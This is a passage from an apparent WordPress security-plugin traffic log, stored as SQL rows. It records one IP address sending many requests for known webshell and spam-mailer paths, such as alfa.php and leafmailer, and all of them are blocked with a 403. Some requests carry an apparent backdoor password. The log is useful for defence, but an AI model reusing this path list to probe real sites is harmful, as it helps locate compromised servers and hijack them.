includes/css/css-blog.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/css\\/css-blog.php\"}','pwmQPILAMdVX7WngjG4hxJuC',0,1674369939.2932,179,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/css/mpv2.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/css\\/mpv2.php\"}','7EPRz65ltB3yaKdVXxLHr1DF',0,1674369939.6348,176,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/css/str_replace.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/css\\/str_replace.php\"}','e4V0y98f2gzasZhwmKIUjNbd',0,1674369939.9676,185,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/customize/elbjewpi.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/customize\\/elbjewpi.php\"}','xZvhQPpsric8FT9UaElYDqGf',0,1674369940.3094,183,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/customize/inpf8747384.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/customize\\/inpf8747384.php\"}','Wju3EhCmXVgpURKcN64LkZYw',0,1674369940.6414,177,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/fonts/setcookie.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/fonts\\/setcookie.php\"}','oh2rVmu7ANXiWfC9ZE4keLy0',0,1674369940.9755,182,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/fonts/sqlite_pagebreak_adapter.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/fonts\\/sqlite_pagebreak_adapter.php\"}','28jsfnpZ3tEd7hLiMkWq16KT',0,1674369941.3536,171,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/ID3/l.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/ID3\\/l.php\"}','lkfQ2F0KsDSqIzpobVdCtjJn',0,1674369941.6819,193,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/ID3/license.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/ID3\\/license.php\"}','4wKnP7lap5RFDi9LNbhcuZEf',0,1674369942.0531,167,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/ID3/module.audio-video.riff-wp.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/ID3\\/module.audio-video.riff-wp.php\"}','EO0jUzwM7qfbrJPpCXF5hHY6',0,1674369942.3825,191,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/ID3/tablepress_controllers.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/ID3\\/tablepress_controllers.php\"}','fmyQTIhVOX0SJHnvWdPwqRFl',0,1674369942.7336,169,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/ID3/unzipper.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/ID3\\/unzipper.php\"}','1eiKutAgXlpNF2sMYHPVCTnW',0,1674369943.0606,198,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/ID3/vp.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/ID3\\/vp.php\"}','7GLsqd9TWwD8aovmnV5YpK0t',0,1674369943.4107,169,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/ID3/wp-plugins.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/ID3\\/wp-plugins.php\"}','CRsJPqN1puxOGHMwTYyUgXFr',0,1674369943.7292,195,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/images/acces.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/images\\/acces.php\"}','iY4dJl62P9EGHW0UX5caCwRQ',0,1674369944.0739,179,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/images/configure.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/images\\/configure.php\"}','nSqOGNCmXaKZeQTVicF3EW0U',0,1674369944.4393,173,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/images/img911.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/images\\/img911.php\"}','Tw6N25syAZFUDYPQGv7E0niq',0,1674369944.7660,174,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/IXR/opt.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/IXR\\/opt.php\"}','uVwOsFehgp5z62S7MATnWr9R',0,1674369945.0938,168,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/IXR/tablepress_controllers.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/IXR\\/tablepress_controllers.php\"}','x1GVYhjOEm32l0wicA9Uafpe',0,1674369945.4192,165,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/js/auto.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/js\\/auto.php\"}','QcfnWVCx6O07DmewkXbj8aGy',0,1674369945.7425,174,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/js/old.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/js\\/old.php\"}','zo9KHtjbcnl7Xy8GDW4e5CVw',0,1674369946.0742,183,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/js/system.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/js\\/system.php\"}','agHYeptzfD6PSivjUCGh9omd',0,1674369946.4295,474,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/pomo/247@abu.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/pomo\\/247@abu.php\"}','rIVdz5pSYhi0JwD6GEyWOmcF',0,1674369947.0804,215,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/pomo/bak.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/pomo\\/bak.php\"}','rCRPSKsbLqj469ZX5kpQxoH2',0,1674369947.4753,176,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/pomo/css_.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/pomo\\/css_.php\"}','7jn2A3EwKRBp0eZ9iyVuNdGW',0,1674369947.8106,194,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/pomo/Oilmoney.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/pomo\\/Oilmoney.php\"}','oKzdZ6kO0smJcFVxLlAXHnga',0,1674369948.1862,185,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/pomo/tablepress_controllers.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/pomo\\/tablepress_controllers.php\"}','g6opOslN3849RTzSKktV1XfH',0,1674369948.5266,161,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/pomo/treame.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/pomo\\/treame.php\"}','opzjUF8yxms4Vu0aqEh5X1cv',0,1674369948.8449,172,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/pomo/user-new.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/pomo\\/user-new.php\"}','ANJPhw52zHEOVtQkTIuK04c3',0,1674369949.1658,218,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/pomo/wp-y4y54.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/pomo\\/wp-y4y54.php\"}','9XCzivyEBteP78owIxKlDMLZ',0,1674369949.5407,160,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/pomo/yellow.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/pomo\\/yellow.php\"}','Ap9xnMmuX5erS3PJBoIL1GaQ',0,1674369949.8578,171,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/pomo/zlib.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/pomo\\/zlib.php\"}','9fZeUsGNbOhFoJI4P5Xk2d8g',0,1674369950.1861,158,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/random_compat/random_bytes_cyclone.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/random_compat\\/random_bytes_cyclone.php\"}','pmJc7VBW0isNoPGAtfabud2Z',0,1674369950.5014,164,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/SimplePie/acces.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/SimplePie\\/acces.php\"}','Co5AcwO6TUkEytizbDlHBM8X',0,1674369950.8233,167,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/theme-compat/back-up.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/theme-compat\\/back-up.php\"}','hQ3iB0J2XkTY4dNuCWsOjRtw',0,1674369951.1967,173,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/theme-compat/border.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/theme-compat\\/border.php\"}','UIo0yAcGjfLdBYn3TQrKwhiO',0,1674369951.5192,163,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/theme-compat/ok.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/theme-compat\\/ok.php\"}','Y4kUdfa3pcr0tFTvPoCm2yeA',0,1674369951.8405,176,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/leafmailer2.8.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/\\/leafmailer2.8.php\"}','htA6Il7TgDFa2f4uZRyJPpzq',0,1674369952.1742,177,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/mail.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/\\/mail.php\"}','0ZtqzPsgS15Gf7mLkhbuxa9K',0,1674369952.5095,252,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/files/x3dleaf.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/files\\/\\/x3dleaf.php\"}','dVlSb4soacPirwJ0KhpjEX2A',0,1674369952.9119,179,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/files/mailer.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/files\\/mailer.php\"}','Ai1NqlhpuB3eSVn2ym6JxKHr',0,1674369953.2516,177,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/js.php/.well-known/mail.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/\\/js.php\\/.well-known\\/\\/mail.php\"}','3Qmov0sMLBlRiSDuNTaEdUky',0,1674369953.5889,219,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/dze.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/dze.php\"}','NMLpRXIeJKTYuaSW21HVrd0h',0,1674369953.9719,165,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/pki-validation/%20.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/pki-validation\\/%20.php\"}','45yxzcArBaRglsw3EFkCq2Go',0,1674369954.2903,202,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/pki-validation/dx.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/pki-validation\\/dx.php\"}','s7vDre0zqMQXUESlOtyjCPxH',0,1674369954.6484,180,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/utchiha505.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/utchiha505.php\"}','KtGvXfpZxhPYybzOWVi60Le3',0,1674369954.9805,202,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/01.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/01.php\"}','emVC3U1kS9jHbKs60c8AXPfO',0,1674369955.3320,178,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/02.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/02.php\"}','9xYcuoDSvHfbqdgFIXAhRe24',0,1674369955.6599,169,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/0z.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/0z.php\"}','qnhl925beINYw8SQpTGmEkcR',0,1674369955.9785,159,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/1.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/1.php\"}','3ZvEgC9ajOtY6SGIy4KiHRnL',0,1674369956.2971,168,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/1337.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/1337.php\"}','8GxrH0hY3nqueaCtQlK6WRAB',0,1674369956.6212,161,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/1h6j5.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/1h6j5.php\"}','MAlJVcaf1EzD7PwXngpjkIsU',0,1674369956.9372,169,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/1index.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/1index.php\"}','6SyeIwQDkLsKY5XGzpTCaHR8',0,1674369957.2652,162,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/1index.php?pass=am*guAW8.ryDgz-TYF','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/1index.php?pass=am*guAW8.ryDgz-TYF\"}','MDSiEQHGlJ1RtXe5wrf9OZIv',0,1674369957.5761,171,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/2index.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/2index.php\"}','KjRvIAd4WNZr61TlGYJLMgxs',0,1674369957.9068,170,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/2index.php?pass=am*guAW8.ryDgz-TYF','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/2index.php?pass=am*guAW8.ryDgz-TYF\"}','8R1I79seU64KgO0xGiZQWJCn',0,1674369958.2340,166,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/3index.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/3index.php\"}','LX4EaKmgOMFsH9035ZlQeThI',0,1674369958.5495,185,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/3x.php?3x=3x','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/3x.php?3x=3x\"}','V6RJGQPfK3WD0eBTYck1m4Fz',0,1674369958.8886,173,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/403.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/403.php\"}','cdW6OTfsHYR9euDC5lm8itpN',0,1674369959.2249,157,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/404.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/404.php\"}','fx2pIbvO6SP5GagqCehmWoBn',0,1674369959.5334,188,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/4price.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/4price.php\"}','PeOuRmwgaQzhvs2FC0T4nkUK',0,1674369959.8730,166,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/about.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/about.php\"}','MWvCUX7ahfENKqwFncD1rp4G',0,1674369960.1976,163,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/admin.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/admin.php\"}','9mu5Qwkv4IxHfLcVteJ78NSg',0,1674369960.5235,175,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/admin/controller/extension/wpm.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/admin\\/controller\\/extension\\/wpm.php\"}','CDc2ag3eU96Qo5uRzMi14Elq',0,1674369960.8583,177,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/alfa.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/alfa.php\"}','ZmACcyIJ90fLxBGvS6KiRqj4',0,1674369961.1855,195,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/ALFA_DATA/alfacgiapi/ups.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/ALFA_DATA\\/alfacgiapi\\/ups.php\"}','uSNxM4iGrkfCyU7bITdFHXa9',0,1674369961.5385,167,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/autoload_classmap.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/autoload_classmap.php\"}','f0AZDtSmhabyivLsM2K1TBJn',0,1674369961.8638,187,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/baindex.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/baindex.php\"}','LDqTK6Bcz4HysEIUV78NnMl5',0,1674369962.2140,177,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/C.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/C.php\"}','N1tTzdw0oqsQKeV7jygAnUfI',0,1674369962.5410,202,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/c.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/c.php\"}','8rC0qzPDEouKfAlSOskB1t42',0,1674369962.8956,173,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/crypted.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/crypted.php\"}','LevODFznAbaxrpGsc4l0hWfJ',0,1674369963.2326,213,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/css/4O4.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/css\\/\\/4O4.php\"}','JOmGt4CvgzAsuyqKLQe2WZac',0,1674369963.5959,164,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/Deadcode1975xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/Deadcode1975xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php\"}','o3vL4QcNrXnzByItOGY19f02',0,1674369963.9182,159,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/DKIZ.php?DKIZ','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/DKIZ.php?DKIZ\"}','F2MoJAkywgeQqZ3rLlvm17dT',0,1674369964.2331,160,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/doc.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/doc.php\"}','4g1JpEoF5hK0TUsVbHR7C9mc',0,1674369964.5422,184,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/fw.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/fw.php\"}','qtRLyOiKDIkx5nw469aVQEAJ',0,1674369964.9011,178,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/good.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/good.php\"}','gmJVYkbMNIe6orZh1KWvLQjS',0,1674369965.2404,166,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/google.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/google.php\"}','uISdjszg901wqycpaXPA8M7v',0,1674369965.5693,193,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/haxor.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/haxor.php\"}','gt7dzB4CcKfJO3n1rWAi6HV5',0,1674369965.9195,160,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/hehe.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/hehe.php\"}','MtDRqeZIJSCHcVo5iEp1FaYP',0,1674369966.2324,159,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/image/screenshot_1.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/image\\/screenshot_1.php\"}','jVxHUw9LPFumK7yvS40bh5NI',0,1674369966.5415,160,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/vuln.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/vuln.php\"}','1yeZWM02UkmblBT37ud4HhwG',0,1674369966.8587,170,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/wp-2019.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/wp-2019.php\"}','gB92M3QhyUXapmNE5kDZxO7W',0,1674369967.1896,157,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/ini.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/ini.php\"}','bc0XWRQkDzY7xEtKOiU3FIuf',0,1674369967.4980,164,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/lock360.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/lock360.php\"}','nEX3lsbYSdCRi0m4f1JODUcN',0,1674369967.8289,169,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/lufix.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/lufix.php\"}','K1G9SebxhkQwZJc7RAHEqiWu',0,1674369968.1468,163,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/mad.php','','{\